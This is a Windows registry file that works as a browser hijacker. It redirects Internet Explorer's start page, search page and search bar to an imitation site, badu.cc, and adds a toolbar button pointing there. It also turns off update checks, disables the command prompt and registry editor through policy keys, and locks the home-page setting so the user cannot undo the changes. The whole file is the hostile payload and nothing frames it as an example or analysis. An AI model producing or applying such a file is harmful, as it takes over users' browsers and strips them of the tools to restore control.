Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\{6096E38F-5AC1-4391-8EC4-75DFA92FB32F}]
"CLSID"="{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"
"Default Visible"="Yes"
"ButtonText"="∞À∂»…œÕ¯µº∫Ω"
"Exec"="http://www.badu.cc"
"HotIcon"="%windir%\\system32\\654.ICO"
"Icon"="%windir%\\system32\\654.ICO"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"NoUpdateCheck"=dword:00000001
"NoJITSetup"=dword:00000001
"Disable Script Debugger"="yes"
"Show_ChannelBand"="No"
"Anchor Underline"="yes"
"Cache_Update_Frequency"="Once_Per_Session"
"Display Inline Images"="yes"
"Do404Search"=hex:01,00,00,00
"Save_Session_History_On_Exit"="no"
"Show_FullURL"="no"
"Show_StatusBar"="yes"
"Show_ToolBar"="yes"
"Show_URLinStatusBar"="yes"
"Show_URLToolBar"="yes"
"Start Page"="http://www.badu.cc/"
"Use_DlgBox_Colors"="yes"
"Search Page"="http://www.badu.cc/"
"FullScreen"="no"
"Enable AutoImageResize"="yes"
"CNSMenu"=dword:de809d5c
"CNSHint"=dword:00000001
"CNSReset"=dword:de809d5c
"CNSEnable"=dword:00000001
"CNSList"=dword:00000001
"CNSAutoUpdate"=dword:00000001
"Use Search Asst"="no"
"Search Bar"="http://www.badu.cc/"
"Enable Browser Extensions"="yes"
"NotifyDownloadComplete"="yes"
"Use FormSuggest"="yes"
"ShowedCheckBrowser"="Yes"
"Check_Associations"="Yes"
"Error Dlg Displayed On Every Error"="no"
"AddToFavoritesExpanded"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableCMD"=dword:00000001
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"HomePage"=dword:00000001